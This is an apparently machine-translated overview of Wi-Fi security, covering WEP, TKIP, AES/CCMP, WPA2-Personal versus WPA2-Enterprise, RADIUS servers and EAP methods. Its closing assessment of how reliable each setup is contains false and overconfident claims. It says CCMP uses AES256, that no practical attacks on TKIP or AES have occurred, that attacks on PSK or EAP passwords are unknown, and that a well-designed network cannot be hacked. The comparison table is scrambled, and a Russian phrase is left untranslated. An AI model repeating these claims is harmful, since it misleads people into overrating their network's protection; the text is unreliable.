WPA2-Enterprise, or the right approach to Wi-Fi network security

Recently, there have been many “revealing” publications about hacking any next protocol or technology that compromises the security of wireless networks. Is this really so, what should you be afraid of, and how to make access to your network as secure as possible? Do WEP, WPA, 802.1x, EAP, PKI mean little to you? This short review will help bring together all the applicable encryption and authorization technologies for radio access. I will try to show that a properly configured wireless network represents an insurmountable barrier for an attacker (to a certain limit, of course).



The basics


Any interaction between the access point (network) and the wireless client is built on:

  • Authentication - both the client and the access point are introduced to each other and confirm that they have the right to communicate with each other;
  • Encryption - which scrambling algorithm of the transmitted data is applied, how the encryption key is generated, and when it changes.


Wireless network parameters, primarily its name (SSID), are regularly announced by the access point in broadcast beacon packets. In addition to the expected security settings, wishes are sent on QoS, on 802.11n parameters, supported speeds, information about other neighbors, and more. Authentication determines how the client presents itself to the point. Possible options:

  • Open - the so-called open network in which all connected devices are authorized immediately
  • Shared - the authenticity of the connected device must be verified with a key / password
  • Eap - the authenticity of the connected device must be verified via EAP by an external server

The openness of the network does not mean that anyone can work with it with impunity. In order to transmit data in such a network, it is necessary that the encryption algorithm used be the same and, accordingly, the encrypted connection must be correctly established. The encryption algorithms are as follows:

  • None - lack of encryption, data is transmitted in clear form
  • WEP - RC4-based cipher with different lengths of static or dynamic keys (64 or 128 bits)
  • CKIP - Cisco's proprietary WEP replacement, early version of TKIP
  • TKIP - Enhanced WEP Replacement with Advanced Validation and Security
  • AES / CCMP - the most advanced algorithm based on AES256 with additional checks and protection


The combination of Open Authentication, No Encryption is widely used in guest access systems such as the Internet in a cafe or hotel. To connect, you only need to know the name of the wireless network. Often, such a connection is combined with additional verification on the Captive Portal by redirecting a custom HTTP request to an additional page on which you can request confirmation (login password, agreement with the rules, etc.).

Encryption WEP compromised and can not use it (even in the case of dynamic keys).

Commonly used terms WPA and WPA2 determine, in fact, the encryption algorithm (TKIP or AES). Due to the fact that for quite some time client adapters support WPA2 (AES), it makes no sense to use TKIP encryption.

Difference Between WPA2 Personal and WPA2 Enterprise is where the encryption keys used in the mechanics of the AES algorithm come from. For private (home, small) applications, a static key (password, codeword, PSK (Pre-Shared Key)) with a minimum length of 8 characters is used, which is set in the settings of the access point and is the same for all clients of this wireless network. Compromise of such a key (a neighbor chatted out, an employee was dismissed, a laptop was stolen) requires an immediate password change for all remaining users, which is realistic only in case of a small number of them. For corporate applications, as the name implies, a dynamic key is used, individual for each working client at the moment. This key can be periodically updated as it works without breaking the connection, and an additional component is responsible for its generation - the authorization server, и почти всегда это RADIUS-сервер.

All possible safety parameters are summarized in this label:
Property Static WEP Dynamic WEP WPA WPA 2 (Enterprise)
Identification User, computer, WLAN card User computer
User computer
User computer
Login
Shared key

Eap

EAP or shared key

EAP or shared key

Integrity

32-bit Integrity Check Value (ICV)

32-bit ICV

64-bit Message Integrity Code (MIC)

CRT / CBC-MAC (Counter mode Cipher Block Chaining Auth Code - CCM) Part of AES

Encryption

Static key

Session key

Package key via TKIP

CCMP (AES)

Key distribution

Single, manual

Pair-wise Master Key (PMK) Segment

Derived from PMK

Derived from PMK

Initialization vector

Text, 24 bits

Text, 24 bits

Extended vector, 65 bits

48-bit packet number (PN)

Algorithm

RC4

RC4

RC4

AES

Key length, bit

64/128

64/128

128

up to 256

Required infrastructure

Not

RADIUS

RADIUS

RADIUS


If everything is clear with WPA2 Personal (WPA2 PSK), the enterprise solution requires additional consideration.

WPA2 Enterprise



Here we are dealing with an additional set of different protocols. On the client side, a special software component, supplicant (usually part of the OS) interacts with the authorizing part, the AAA server. This example depicts the operation of a unified radio network built on lightweight access points and a controller. In the case of using access points with brains, the entire role of an intermediary between clients and the server can be assumed by the point itself. At the same time, the data of the client supplicant is transmitted by radio generated in the 802.1x protocol (EAPOL), and on the controller side it is wrapped in RADIUS packets.

Applying the EAP authorization mechanism on your network leads to the fact that after a successful (almost certainly open) authentication of the client by the access point (together with the controller, if any), the latter asks the client to authorize (confirm its credentials) from the infrastructure RADIUS server:
Using WPA2 Enterprise requires a RADIUS server on your network. At present, the following products are the most efficient:
  • Microsoft Network Policy Server (NPS), the former IAS - is configured via MMC, is free, but you need to buy Windows
  • Cisco Secure Access Control Server (ACS) 4.2, 5.3 - configurable via a web interface, sophisticated in functionality, allows you to create distributed and fault-tolerant systems, is expensive
  • FreeRADIUS - free, configurable by text configs, not convenient to manage and monitor


In this case, the controller carefully monitors the ongoing exchange of information, and waits for a successful authorization, or denial of it. If successful, the RADIUS server is able to transmit additional parameters to the access point (for example, in which VLAN to place the subscriber, which IP address, QoS profile, etc.). At the end of the exchange, the RADIUS server enables the client and the access point to generate and exchange encryption keys (individual, valid only for this session):



Eap


The EAP protocol itself is containerized, that is, the actual authorization mechanism is at the mercy of the internal protocols. At the moment, the following have received any significant distribution:
  • EAP-FAST (Flexible Authentication via Secure Tunneling) - developed by Cisco; allows authorization by login-password transmitted inside the TLS tunnel between the supplicant and the RADIUS server
  • EAP-TLS (Transport Layer Security). It uses the public key infrastructure (PKI) to authorize the client and server (supplicant and RADIUS server) through certificates issued by a trusted certification authority (CA). It requires issuing and installing client certificates on each wireless device, therefore it is suitable only for a managed corporate environment. The Windows certificate server has tools that allow the client to independently generate a certificate if the client is a member of a domain. Blocking a client is easily done by revoking his certificate (or through accounts).
  • EAP-TTLS (Tunneled Transport Layer Security) is similar to EAP-TLS, but a client certificate is not required when creating a tunnel. In such a tunnel, similar to the SSL connection of the browser, additional authorization is performed (by password or somehow).
  • PEAP-MSCHAPv2 (Protected EAP) - similar to EAP-TTLS in terms of the initial establishment of an encrypted TLS tunnel between a client and a server that requires a server certificate. Subsequently, authorization using the well-known MSCHAPv2 protocol takes place in such a tunnel.
  • PEAP-GTC (Generic Token Card) - similar to the previous one, but requires one-time password cards (and the corresponding infrastructure)


All these methods (except for EAP-FAST) require a server certificate (on a RADIUS server) issued by a certification authority (CA). In this case, the CA certificate itself must be present on the client device in the trusted group (which is easy to implement using Group Policy in Windows). Additionally, EAP-TLS requires an individual client certificate. Client authentication is performed both by digital signature and (optionally) by comparing the certificate provided by the client to the RADIUS server with the fact that the server extracted it from the PKI infrastructure (Active Directory).

Support for any of the EAP methods must be provided by a client-side supplicant. The standard built-in Windows XP / Vista / 7, iOS, Android provides at least EAP-TLS, and EAP-MSCHAPv2, which makes these methods popular. With Intel client adapters for Windows, ProSet is available to expand the available list. The same does Cisco AnyConnect Client.





How reliable is it?


After all, what does an attacker need to break into your network?

For Open Authentication, No Encryption is nothing. Connected to the network, and that’s it. Since the radio environment is open, the signal propagates in different directions, blocking it is not easy. If you have the appropriate client adapters that allow you to listen to the ether, the network traffic is visible as if the attacker had connected to the wire, to the hub, to the switch SPAN port.
WEP-based encryption only requires time to search for IV, and one of the many freely available scanning utilities.
For encryption based on TKIP or AES, direct decryption is possible in theory, but in practice no hacking has occurred.

Of course, you can try to pick up a PSK key, or a password for one of the EAP methods. Common attacks on these methods are not known. You can try to apply methods of social engineering, or thermorectal cryptanalysis .

You can access the network protected by EAP-FAST, EAP-TTLS, PEAP-MSCHAPv2 only by knowing the user's login password (hacking is not possible as such). Attacks such as password cracking, or aimed at vulnerabilities in MSCHAP are also not possible or difficult due to the fact that the EAP channel "client-server" is protected by an encrypted tunnel.

Access to a network closed by PEAP-GTC is possible either when a token server is hacked, or when a token is stolen along with its password.

Access to a network closed by EAP-TLS is possible when a user certificate is stolen (along with its private key, of course), or when a valid but fraudulent certificate is issued. This is possible only if the certification center is compromised, which in normal companies is cherished as the most valuable IT resource.

Since all of the above methods (except PEAP-GTC) allow the storage (caching) of passwords / certificates, then when a mobile device is stolen, an attacker gains full access without unnecessary questions from the network. As a preventive measure, full encryption of the hard disk with a password request when turning on the device can serve.

Remember: with proper design, a wireless network can be very well protected; there is no means of hacking such a network (to a known limit)